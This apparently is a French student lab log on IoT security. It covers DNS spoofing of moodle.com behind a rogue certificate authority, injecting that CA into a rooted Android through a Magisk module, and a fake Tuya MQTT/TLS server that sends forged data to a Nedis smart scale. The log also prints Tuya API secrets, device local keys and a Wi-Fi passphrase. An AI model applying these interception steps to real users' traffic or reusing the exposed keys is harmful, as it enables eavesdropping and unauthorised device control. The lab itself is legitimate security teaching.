"3": "kg"
}
# =========================================

# ---------- TUYA CRYPTO ----------
def tuya_encrypt(data: dict, local_key: bytes) -> str:
raw = json.dumps(data, separators=(',', ':')).encode()
cipher = AES.new(local_key, AES.MODE_ECB)
encrypted = cipher.encrypt(pad(raw, 16))
return base64.b64encode(encrypted).decode()

def tuya_sign(enc_data: str, ts: int, local_key: bytes) -> str:
s = f"data={enc_data}&t={ts}&key={local_key.decode()}"
return hashlib.md5(s.encode()).hexdigest()

def build_tuya_payload(dps: dict, device_id: str) -> dict:
ts = int(time.time())
enc = tuya_encrypt({
"devId": device_id,
"dps": dps
}, LOCAL_KEY)
sign = tuya_sign(enc, ts, LOCAL_KEY)
return {
"protocol": 4,
"t": ts,
"data": enc,
"sign": sign
}

def extract_device_id(topic: str) -> str:
return topic.split("/")[-1]

# ---------- MQTT UTILS ----------
def encode_remaining_length(length):
out = bytearray()
while True:
byte = length % 128
length //= 128
if length > 0:
byte |= 0x80
out.append(byte)
if length == 0:
break
return out

def create_mqtt_packet(pkt_type, flags, payload):
header = bytes([(pkt_type << 4) | flags])
return header + encode_remaining_length(len(payload)) + payload

# ---------- SERVER ----------
def start_server():
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile=CERT_FILE, keyfile=KEY_FILE)

sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(("0.0.0.0", PORT))
sock.listen(5)

print(f"[*] Serveur MQTT TLS Tuya prêt sur {PORT}")

published_topics = set()

while True:
client, addr = sock.accept()
print(f"\n[+] Connexion de {addr[0]}")

try:
conn = context.wrap_socket(client, server_side=True)
print("TLS OK")

while True:
header = conn.recv(1)
if not header:
break

pkt_type = header[0] >> 4

# Remaining length
multiplier = 1
remaining_len = 0
while True:
b = conn.recv(1)[0]
remaining_len += (b & 127) * multiplier
multiplier *= 128
if not (b & 128):
break

payload = b""
while len(payload) < remaining_len:
payload += conn.recv(remaining_len - len(payload))

# -------- HANDLERS --------
if pkt_type == 1: # CONNECT
print(">>> CONNECT")
conn.send(b"\x20\x02\x00\x00") # CONNACK OK

elif pkt_type == 8: # SUBSCRIBE
msg_id = payload[0:2]
topic_len = struct.unpack("!H", payload[2:4])[0]
topic = payload[4:4+topic_len].decode(errors="ignore")

print(f">>> SUBSCRIBE : {topic}")
conn.send(create_mqtt_packet(9, 0x00, msg_id + b"\x01")) # SUBACK QoS 1

# Publication automatique
device_id = extract_device_id(topic)
tuya_payload = build_tuya_payload(DPS_POIDS, device_id)
json_payload = json.dumps(tuya_payload)

topic_bytes = topic.encode()
var_header = struct.pack("!H", len(topic_bytes)) + topic_bytes
packet_payload = var_header + json_payload.encode()

# PUBLISH QoS 1
packet = create_mqtt_packet(3, 0x02, packet_payload)
time.sleep(0.5)
conn.send(packet)
print("POIDS TUYA CHIFFRÉ ENVOYÉ")

elif pkt_type == 4: # PUBACK
print("<<< PUBACK")

elif pkt_type == 10: # UNSUBSCRIBE
msg_id = payload[0:2]
conn.send(create_mqtt_packet(11, 0x00, msg_id))
print("<<< UNSUBACK")

elif pkt_type == 12: # PINGREQ
conn.send(b"\xd0\x00")

else:
print(f"MQTT type {pkt_type} ignoré")

except Exception as e:
print(f"Erreur : {e}")

finally:
try:
conn.close()
except:
pass

if __name__ == "__main__":
start_server()

</syntaxhighlight>Je pense que pour faire fonctionner cette méthode, il faut absolument que je trouve la clé qui crypte le message pour que Nedis l'accepte quand il le reçoit

J'ai donc cherché dans cette direction et j'ai découvert deux choses.

Premièrement, TinyTuya, une API Python pour les appareils intelligents Tuya (génial, Nedis utilise Tuya) WiFi utilisant une connexion directe au réseau local (LAN) ou le cloud (API TuyaCloud). TinyTuya permet entre autre de récupérer la fameuse clé.

Ensuite, j'ai découvert la plateforme IOT de Tuya qui permet, en connectant son application de téléphone sur le site, de jouer avec ses appareils Tuya pour une connexion avec Home Assisant ou encore ... TinyTuya !

Spoiler alerte: J'ai du changer d'application et cette application ne tape plus sur la même adresse. Elle tape sur XX-eu.lifeaiot.com il a donc fallu refaire une redirection vers notre serveur pour ces nouvelles adresses.

Spoiler alerte: j'ai la clé. Je parle plus de TinyTuya dans la prochaine partie car même avec cette clé, ce faux serveur ne marche pas. Je vais donc tenter d'autres pistes.

== TinyTuya ==
Dans cette partie, nous allons tenter de connecter notre balance à notre faux serveur en utilisant l'utilitaire TinyTuya. Le but est de récupérer le poids de l'utilisateur de la balance lorsqu'il se pèse.

Dans un premier temps il a fallu connecter l'appli à la platforme IOT de Tuya. L'application "Nedis Smartlife" de Nedis, qui utilise bien la même base que l'application Smartlife de Tuya (oui oui c'est le même nom…) ne veux pas se connecter à la plateforme pour une raison inexplicable (et au vu du nombre de forum qui parle du sujet, je ne suis pas le seul).

J'ai donc du connecter ma balance sur l'appli Smartlife qui a bien voulu se connecter à la plateforme.

Cela me permet de récupérer avec TinyTuya les périphériques

Et je vais maintenant tenter d'expliquer le fonctionnement de TinyTuya étape par étape…

Déjà pourquoi connecter l'application avec la plateforme IOT de Tuya --> Cela permet à l'appli de récupérer les appareils connectés de mon application, elle va générer un ID et une clé.

Et comment faire pour que TinyTuya est accès aux appareils --> grâce à la commande <code>python -m tinytuya wizard</code> qui va prendre l'ID et la clé pour récupérer les appareils.

Ensuite la commande suivante va permettre à TinyTuya de détecter nos appareils qui sont effectivement connecté à notre réseau :<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya devices
TinyTuya (Tuya device scanner) [1.17.4] Loaded devices.json - 1 devices: Device Listing [
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {} } ]
</syntaxhighlight>Et la, magie, on obtient la clé de la balance, on va pouvoir enfin récupérer le poids de notre utilisateur grâce à ce code python qui écoute la balance:<syntaxhighlight lang="python">
import tinytuya

DEVICE_ID = '84853100a4e57c162d4c'
IP_ADDRESS = '172.16.10.105'
LOCAL_KEY = 'V[z^Gr|qekh]9z_>'

# Connexion à l'appareil
d = tinytuya.Device(DEVICE_ID, IP_ADDRESS, LOCAL_KEY)

d.set_version(3.3)

# Récupérer le statut
data = d.status()
print("Statut complet :", data)
</syntaxhighlight>Évidemment cela ne fonctionne pas. Et pourquoi ? Et bien si l'on regarde dans le bloc <code>python3 -m tinytuya devices TinyTuya</code> on observe que le champs mapping est vide. Ce champs est censé afficher toute les données que TinyTuya est censé pouvoir récupérer … et il est vide …

Soit je suis à l'origine de ce problème, soit TinyTuya ne permet de changer nous ampoules connecté en rouge si la balance affiche que notre objectif de poids est dépassé …

Affaire à suivre.

TODO : ne marche pas en local ? tenter d'enlever la redirection

<syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard -force
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n):

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "D\u00e9tecteur de fum\u00e9e",
"id": "86730270483fda3155d0",
"key": "r@fAdR'PW~0O`v5@",
"mac": "48:3f:da:31:55:d0",
"uuid": "86730270483fda3155d0",
"sn": "1000716370419B",
"category": "ywbj",
"product_name": "Smoke detector",
"product_id": "inwnovped8h5aoaw",
"biz_type": 18,
"model": "WIFIDS20WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/651af99cad24017128e3dc2322461ae5.png",
"mapping": {
"1": {
"code": "smoke_sensor_status",
"type": "Enum",
"values": {
"range": [
"alarm",
"normal"
]
}
},
"14": {
"code": "battery_state",
"type": "Enum",
"values": {
"range": [
"low",
"middle",
"high"
]
}
}
}
},
{
"name": "P\u00e8se pas que des personnes",
"id": "84853100a4e57c162d4c",
"key": "V[z^Gr|qekh]9z_>",
"mac": "a4:e5:7c:16:2d:4c",
"uuid": "84853100a4e57c162d4c",
"sn": "10003702800241",
"category": "qt",
"product_name": "Personal Scale",
"product_id": "arjciqapuueq9cvt",
"biz_type": 18,
"model": "WIFIHS10WT",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/1652104387fa2f735a389.png",
"mapping": {}
}
]

>> Saving list to devices.json
2 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
Scan network 172.16.10.0/24 from interface eth0? ([Y]es/[n]o/[a]ll yes):
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
Scan network 172.26.145.0/24 from interface eth1? ([Y]es/[n]o/[a]ll yes): n
0 local devices discovered

Polling local devices...
[Détecteur de fumée ] Error: No IP found
[Pèse pas que des personne] Error: No IP found

>> Saving device snapshot data to snapshot.json

Done.

</syntaxhighlight><syntaxhighlight lang="linux-config">
(test) root@SE5:~/py_file# python3 -m tinytuya wizard
TinyTuya Setup Wizard [1.17.4]

Existing settings:
API Key=g5wufknjhcwqkkpsrgug
Secret=edac1effd9374f50b6c61ddd2ea1e734
DeviceID=84853100a4e57c162d4c
Region=eu

Use existing credentials (Y/n): n

Enter API Key from tuya.com: g5wufknjhcwqkkpsrgug
Enter API Secret from tuya.com: edac1effd9374f50b6c61ddd2ea1e734
Enter any Device ID currently registered in Tuya App (used to pull full list) or 'scan' to scan for one: bf85da6b2eccef5784rydz

Region List
cn China Data Center (alias: AY)
us US - Western America Data Center (alias: AZ)
us-e US - Eastern America Data Center (alias: UE)
eu Central Europe Data Center
eu-w Western Europe Data Center (alias: WE)
in India Data Center
sg Singapore Data Center

Enter Your Region (Options: cn, us, us-e, eu, eu-w, in, or sg): eu

>> Configuration Data Saved to tinytuya.json
{
"apiKey": "g5wufknjhcwqkkpsrgug",
"apiSecret": "edac1effd9374f50b6c61ddd2ea1e734",
"apiRegion": "eu",
"apiDeviceID": "bf85da6b2eccef5784rydz"
}

Download DP Name mappings? (Y/n):

Device Listing

[
{
"name": "Ampoule Connect\u00e9e",
"id": "bf85da6b2eccef5784rydz",
"key": "ZO:}y#{'gM.QuI|T",
"mac": "10:5a:17:a9:b5:6f",
"uuid": "b73f1a854ac4219e",
"sn": "830-2-20148D",
"category": "dj",
"product_name": "Smart bulb",
"product_id": "mdzqw8qjfzfdjz9n",
"biz_type": 18,
"model": "WIFILRW10E27",
"sub": false,
"icon": "https://images.tuyaeu.com/smart/icon/ay1513237774906SMBA3/9a70929a5f5c1855c1c091ab404b8319.png",
"mapping": {
"20": {
"code": "switch_led",
"type": "Boolean",
"values": {}
},
"21": {
"code": "work_mode",
"type": "Enum",
"values": {
"range": [
"white",
"colour",
"scene",
"music"
]
}
},
"22": {
"code": "bright_value_v2",
"type": "Integer",
"values": {
"min": 10,
"max": 1000,
"scale": 0,
"step": 1
}
},
"23": {
"code": "temp_value_v2",
"type": "Integer",
"values": {
"min": 0,
"max": 1000,
"scale": 0,
"step": 1
}
},
"25": {
"code": "scene_data_v2",
"type": "Json",
"raw_values": "{\"scene_num\":{\"min\":1,\"scale\":0,\"max\":8,\"step\":1},\"scene_units\": {\"unit_change_mode\":{\"range\":[\"static\",\"jump\",\"gradient\"]},\"unit_switch_duration\":{\"min\":0,\"scale\":0,\"max\":100,\"step\":1},\"unit_gradient_duration\":{\"min\":0,\"scale\":0,\"max\":100,\"step\":1},\"bright\":{\"min\":0,\"scale\":0,\"max\":1000,\"step\":1},\"temperature\":{\"min\":0,\"scale\":0,\"max\":1000,\"step\":1},\"h\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":360,\"step\":1},\"s\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1},\"v\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}}}",
"values": {
"scene_num": {
"min": 1,
"scale": 0,
"max": 8,
"step": 1
},
"scene_units": {
"unit_change_mode": {
"range": [
"static",
"jump",
"gradient"
]
},
"unit_switch_duration": {
"min": 0,
"scale": 0,
"max": 100,
"step": 1
},
"unit_gradient_duration": {
"min": 0,
"scale": 0,
"max": 100,
"step": 1
},
"bright": {
"min": 0,
"scale": 0,
"max": 1000,
"step": 1
},
"temperature": {
"min": 0,
"scale": 0,
"max": 1000,
"step": 1
},
"h": {
"min": 0,
"scale": 0,
"unit": "",
"max": 360,
"step": 1
},
"s": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"v": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
}
}
}
},
"26": {
"code": "countdown_1",
"type": "Integer",
"values": {
"unit": "s",
"min": 0,
"max": 86400,
"scale": 0,
"step": 1
}
},
"28": {
"code": "control_data",
"type": "Json",
"raw_values": "{\"change_mode\":{\"range\":[\"direct\",\"gradient\"]}, \"bright\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}, \"temperature\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":1000,\"step\":1}, \"h\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":360,\"step\":1},\"s\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":255,\"step\":1},\"v\":{\"min\":0,\"scale\":0,\"unit\":\"\",\"max\":255,\"step\":1}}",
"values": {
"change_mode": {
"range": [
"direct",
"gradient"
]
},
"bright": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"temperature": {
"min": 0,
"scale": 0,
"unit": "",
"max": 1000,
"step": 1
},
"h": {
"min": 0,
"scale": 0,
"unit": "",
"max": 360,
"step": 1
},
"s": {
"min": 0,
"scale": 0,
"unit": "",
"max": 255,
"step": 1
},
"v": {
"min": 0,
"scale": 0,
"unit": "",
"max": 255,
"step": 1
}
}
},
"30": {
"code": "rhythm_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"31": {
"code": "sleep_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"32": {
"code": "wakeup_mode",
"type": "Raw",
"values": {
"maxlen": "255"
}
},
"41": {
"code": "remote_switch",
"type": "Boolean",
"values": {}
}
}
}
]

>> Saving list to devices.json
1 registered devices saved

>> Saving raw TuyaPlatform response to tuya-raw.json

Poll local devices? (Y/n):

Scanning local network for Tuya devices...
1 local devices discovered

Polling local devices...
[Ampoule Connectée ] 172.16.10.108 - [On] - DPS: {'20': True, '21': 'white', '22': 1000, '23': 1000, '25': '000e0d0000000000000000c80000', '26': 0, '41': True}

>> Saving device snapshot data to snapshot.json

>> Saving IP addresses to devices.json
1 device IP addresses found

Done.

</syntaxhighlight>

SE5 IdO sécurité des objets 2025/2026 b1

2026-01-13T17:30:15Z

Vdetrez : /* TinyTuya */

[[Fichier:1107px-Titre page.png|sans_cadre|820x820px]]

= Serveur virtuel (17/09) =
Dans un premier temps, on vient créer un serveur virtuel sur <code>capbreton</code> avec la commande <code>xen-create-image --hostname=SE5.vdetrez --dhcp --dir=/usr/local/xen --size=10G --memory=2G --dist=daedalus --bridge=bridgeStudents</code>

Ensuite, sur capbreton dans le dossier <code>/etc/network/interfaces.d</code> on vient créer un fichier <code>g1_vdetrez</code> pour mettre en place une nouvelle interface dans le VLAN 410. <syntaxhighlight lang="linux-config">
auto Trunk.410
iface Trunk.410 inet manual
vlan-raw-device Trunk
up ip link set $IFACE up
down ip link set $IFACE down

auto g1_vdetrez
iface g1_vdetrez inet manual
bridge_ports Trunk.410
up ip link set $IFACE up
down ip link set $IFACE down

</syntaxhighlight>

On a maintenant accès à la machine SE5.vdetrez (en ayant évidemment fait l'erreur de mettre "." à la place de "-") et on vient y configurer nos adresses IPv4.

Mon adresse IPv4 routée est la <code>172.26.145.100</code> et mon IPv4 dans le VLAN 410 est <code>172.16.10.0</code> <syntaxhighlight lang="linux-config">
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).

# The loopback network interface
auto lo
iface lo inet loopback

# The primary network interface
auto eth0
iface eth0 inet static
address 172.26.145.110
netmask 255.255.255.0
gateway 172.26.145.251
# post-up ethtool -K eth0 tx off

auto eth1
iface eth1 inet static
address 172.16.10.0/24
#
# The commented out line above will disable TCP checksumming which
# might resolve problems for some users. It is disabled by default
#

</syntaxhighlight>

On vérifie avec la commande <code>ip a</code><syntaxhighlight lang="linux-config">
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:41 brd ff:ff:ff:ff:ff:ff
inet 172.26.145.110/24 brd 172.26.145.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 2001:660:4401:6050:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 853sec preferred_lft 753sec
inet6 2a01:c916:2047:c850:216:3eff:fe23:7441/64 scope global dynamic mngtmpaddr
valid_lft 2591853sec preferred_lft 604653sec
inet6 fe80::216:3eff:fe23:7441/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:16:3e:23:74:42 brd ff:ff:ff:ff:ff:ff
inet 172.16.10.0/24 brd 172.16.10.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::216:3eff:fe23:7442/64 scope link
valid_lft forever preferred_lft forever

</syntaxhighlight>

Et on constate que notre serveur a accès à Internet avec la commande <code>ping 8.8.8.8</code>

= Point d'accès WiFi (29/09) =
Pour l'instant, nous mettons de côté ce point du TP car il n'est pas utile pour la suite.

= Sécurisation WiFi par WPA2-PSK =

Pour communiquer avec le routeur <code>Cisco</code>, on branche le port série en USB et on se connecte avec la commande <code>minicom -D /dev/ttyUSB0 -b 9600</code>. La première étape fut la création du SSID <code>SE5-SSID10</code>.<syntaxhighlight lang="linux-config">
dot11 ssid SE5-SSID10

vlan 410

authentication open

authentication key-management wpa version 2

wpa-psk ascii Cisco2025

exit
</syntaxhighlight>
Puis, on configure l'interface <code>Dot11Radio0</code><syntaxhighlight lang="linux-config">
interface dot11radio 0

encryption mode ciphers aes-ccm

ssid SE5-SSID10

station-role root

no shutdown
</syntaxhighlight>Après cela, on retourne sur notre serveur virtuel et on y implémente un serveur DHCP pour l'attribution des IP aux machines se connectant sur le routeur. On retrouve cette configuration dans <code>/etc/dhcp/dhcpd.conf</code><syntaxhighlight lang="linux-config">
# dhcpd.conf

option domain-name "plil.info";
option domain-name-servers ns.plil.info;

default-lease-time 600;
max-lease-time 7200;

ddns-update-style none;

authoritative;

subnet 172.16.10.0 netmask 255.255.255.0 {
range 172.16.10.100 172.16.10.200;
option domain-name-servers 172.16.10.1;
option routers 172.16.10.1;
default-lease-time 600;
max-lease-time 7200;
}
</syntaxhighlight>Puis, on implémente un serveur DNS minimal dans le fichier <code>/etc/bind/named.conf.options</code><syntaxhighlight lang="linux-config">
options {
directory "/var/cache/bind";

recursion yes;
allow-query {172.16.10.0/24; 127.0.0.1;};

forwarders {
8.8.8.8;
1.1.1.1;
};

dnssec-validation auto;

listen-on {127.0.0.1; 172.16.10.1;};
listen-on-v6 { none; };
};
</syntaxhighlight>Et enfin, on met en place une mascarade entre le VLAN 410 et le routeur du réseau des salles de projets pour donner l'accès à Internet.<syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

= Interception de flux (30/09) =

== Redirection par DNS ==
Pour cette partie, on va ajouter une zone primaire à notre serveur DNS avec le nom Internet du site que l'on veut rediriger vers notre machine.

Ici, ce sera le merveilleux <code>moodle.com</code>

D'abord, on modifie <code>/etc/bind/named.conf.local</code><syntaxhighlight lang="linux-config">
//
// Do any local configuration here
//

// Consider adding the 1918 zones here, if they are not used in your
// organization
//include "/etc/bind/zones.rfc1918";

zone "moodle.com" {
type master;
file "/etc/bind/db.moodle.com";
};
</syntaxhighlight>Puis, on crée la fameuse zone <code>db.moodle.com</code> dans le même répertoire <syntaxhighlight lang="linux-config">
$TTL 200
@ IN SOA ns.moodle.com. admin.moodle.com. (
5 ;
3600 ;
1800 ;
604800 ;
86400 ;
)
IN NS ns.moodle.com.
ns IN A 172.16.10.1
@ IN A 172.16.10.1
www IN CNAME ns
</syntaxhighlight>Pour vérifier si notre configuration est correcte, on exécute ces deux commandes :

<code>sudo named-checkconf</code>

<code>sudo named-checkzone moodle.com /etc/bind/db.moodle.com</code>

== Redirection réseau ==
Dans cette partie, on ajoute une règle <code>iptables</code> pour rediriger le flux TCP vers un port local, le <code>8080</code>.

<code>iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-ports 8080</code><syntaxhighlight lang="linux-config">
Chain PREROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 REDIRECT 6 -- eth0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80 redir ports 8080

Chain INPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination

Chain POSTROUTING (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
385 133K MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
0 0 MASQUERADE 0 -- * eth0 172.16.10.0/24 0.0.0.0/0
</syntaxhighlight>

== Serveur apache sécurise (04/10) ==

Dans un premier temps, on va créer un certificat auto-signé :

<code>openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/ssl/apache/apache-selfsigned.key -out /etc/ssl/apache/apache-selfsigned.crt -subj "/C=FR/ST=Nord/L=Lille/O=Popo/CN=moodle.com"</code>

Puis, on configure <code>Apache2</code>
<syntaxhighlight lang="linux-config">
GNU nano 7.2 /etc/apache2/sites-available/secure-site.conf
<VirtualHost *:443>
ServerName moodle.com

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/apache/apache.crt
SSLCertificateKeyFile /etc/ssl/apache/apache.key

# Optionnel : log
ErrorLog ${APACHE_LOG_DIR}/ssl-error.log
CustomLog ${APACHE_LOG_DIR}/ssl-access.log combined
</VirtualHost>

# Redirection HTTP ^f^r HTTPS
<VirtualHost *:80>
ServerName moodle.com
Redirect permanent / https://moodle.com/
</VirtualHost>
</syntaxhighlight>

Maintenant, en prévision de la suite (voir explication dans Machine virtuelle Android), on va créer une autorité de certification nommée CertiFiable :

<code>openssl req -x509 -new -nodes -keyout ca.key -sha256 -days 365 -out ca.crt -subj "/CN=CertiFiable"</code>

Puis, on vient générer une demande de signature de certificat :

<code>openssl req -new -newkey rsa:2048 -nodes -keyout apache.key -out apache.csr -subj "/CN=moodle.com"</code>

Enfin, on vient signer le site avec le certificat de CertiFiable :

<code>openssl x509 -req -in apache.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out apache.crt -days 365 -sha256</code>

= Machine virtuelle <code>android</code> =

== Première tentative ==
Actuellement, si on navigue sur internet et que l'on se rend sur moodle.com, on atterrit bien sûr le faux Moodle, mais comme le téléphone ne connait pas l'autorité de certification nommé CertiFiable, on a le droit à ce magnifique message de connexion non sécurisée :

[[Fichier:Avertissement moodle.png|sans_cadre]][[Fichier:Moodle le magnifique.png|sans_cadre]]

Malheureusement, il est aujourd'hui impossible d'ajouter facilement une autorité de certification sur son téléphone.

C'est pour cela qu'une solution proposée est d'installer une machine virtuelle d'une ancienne version d'<code>Android</code> où il était possible d'en ajouter.

En ayant suivi ce tuto (https://help.clouding.io/hc/en-us/articles/4405454393756-How-to-virtualize-Android-with-QEMU-KVM), j'ai réussi à installer une VM sur Zabeth4 (j'ai dû prendre une autre iso car celle du site était inaccessible).

J'ai installé <code>VNC Viewer</code> pour pouvoir manipuler la machine virtuelle.

En étant sur la VM, j'ai pu me rendre compte qu'il n'était pas possible de se connecter au WiFi, c'est la connexion du pc qui est simulé comme un réseau WiFi dans la VM.

J'ai pu réfléchir à deux solutions avant que la VM ne crash d'elle-même et soit impossible à redémarrer...

La première est toute simple, connecter la Zabeth directement au WiFi, ce qui est difficile à distance. La seconde, qui est je pense possible, est de changer la carte réseau dans les fichiers de conf de la VM pour mettre celle supportant le WiFi.

Je n'ai donc pu tester aucune de ces deux solutions, la VM n'étant plus.

== Seconde tentative ==

Pour cette seconde tentative, j'utilise les commandes suivantes avec plusieurs ISO Android.<syntaxhighlight lang="linux-config">
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw
qemu-system-x86_64 -net nic -net user -m 1024 -enable-kvm -display sdl -drive file=android.img,format=raw -cdrom *android-x86*.iso -boot d
qemu-system-x86_64 -m 2048 -enable-kvm -cpu host -smp 2 -display sdl -drive file=android.img,format=raw,if=virtio -usb -device usb-host,vendorid=0x148f,productid=0x5370
</syntaxhighlight>J'ai pu donc pu faire face:

- À un ISO sans les services Google et sans navigateur ...

- Un trop ancien pour Nedis

- Un qui refuse l'installation d'APK

- Un trop récent pour l'installation de certificat.

- Un qui refuse de se laisser root

En fin de séance, je n'ai malheureusement pas de VM Android fonctionnelle.

== Ultime tentative (qui marche) ==
Cette fois ci j'utilise l'application Android Studio qui permet d'émuler des téléphones Android pour le débogage d'application. On va donc s'en servir pour créer un Android routé qui va recevoir notre certificat.

Dans un premier temps j'ai donc routé mon téléphone avec l'utilitaire Magisik en suivant ce tutoriel : https://www.youtube.com/watch?v=QzsNn3GhYYk&t=374s.

Puis je viens ajouter un module dans Magisk qui permet de recharger à chaque demarrage du téléphone le certificat en question.

Le certificat peut être ajouter dans le téléphone en utilisant la commande <code>adb push xyzxyzxyz.0</code> .

La manipulation est la suivante :<syntaxhighlight lang="linux-config">
adb shell
su
cd /data/adb/modules/
mkdir -p tuya_cert/system/etc/security/cacerts
echo "id=tuya_cert" > tuya_cert/module.prop echo "name=Tuya Certificate Injection" >> tuya_cert/module.prop echo "version=1.0" >> tuya_cert/module.prop echo "versionCode=1" >> tuya_cert/module.prop echo "author=Victo" >> tuya_cert/module.prop echo "description=Injecte le certificat Tuya dans le systeme" >> tuya_cert/module.prop
touch tuya_cert/auto_mount
cp /sdcard/Download/26e33623.0 /data/adb/modules/tuya_cert/system/etc/security/cacerts/
chmod 644 /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
chown root:root /data/adb/modules/tuya_cert/system/etc/security/cacerts/26e33623.0
reboot
</syntaxhighlight>On a donc maintenant une VM Android avec notre certificat. Il faut maintenant que le PC qui host cette VM soit connecté à notre borne WiFi pour pouvoir constater que notre site Moodle.com est bien redirigé et sécurisé.

= Machine <code>Android</code> (06/10) =
Pour cette dernière partie, j'ai retrouvé une tablette sous <code>Android 4.4 KitKat</code> qui permet d'ajouter des autorités de certification.

C'est donc ce que j'ai fait :

[[Fichier:Photo_certifiable.png|sans_cadre]]

Maintenant, on constate en se connectant sur moodle.com à partir de cette tablette que l'on est bien redirigé vers le faux site et qu'il est sécurisé avec le magnifique cadenas vert.

[[Fichier:Photo moodle.png|sans_cadre]]

(cette page web date du 06/10/25, elle n'est plus valable depuis le 10/10/25...)

= Nedis Wi-Fi Smart Personal Scales =

Dans ce second TP, nous allons jouer avec ce pèse personne de nedis.

Dans un premier temps, j'ai connecté la balance au réseau SE5-SSID10.

Puis j'ai remarqué que quand je tentais de me peser, la balance affichait err2.

Après une courte investigation, il s'agit d'une balance qui émet des signaux électriques pour analyser la composition corporelle donc si on se pèse avec des chaussures, cela pose problème.

Pour la suite du projet, on se pèsera avec les mains.

[[Fichier:Poid_sur_app_nedis.png|sans_cadre]]

== Redirection du poids vers notre serveur ==
Dans un premier temps, mon idée était de faire croire à la balance qu'elle communique effectivement avec son serveur pour pouvoir récupérer les informations sur la santé de l'utilisateur.

Ici on constate sur ces paquets la requête de la balance pour obtenir une IP, puis le moment ou elle l'obtient.

[[Fichier:WS connection balance.png|sans_cadre|858x858px]]

Je peux donc ping ma balance depuis mon pc (celui qui host ma VM android)

[[Fichier:PIng balance.png|sans_cadre]]

Maintenant je veux voir les messages de communication entre la balance, son serveur et l'application, pour ce faire je fais <code>tcpdump -i eth1 -n port 53</code> :<syntaxhighlight lang="linux-config">
14:46:51.115996 IP 172.16.10.105.49153 > 172.16.10.1.53: 13861+ A? m2.tuyaeu.com. (31)
14:46:51.125611 IP 172.16.10.1.53 > 172.16.10.105.49153: 13861 3/0/0 A 3.120.92.134, A 18.184.31.90, A 35.156.44.172 (79)
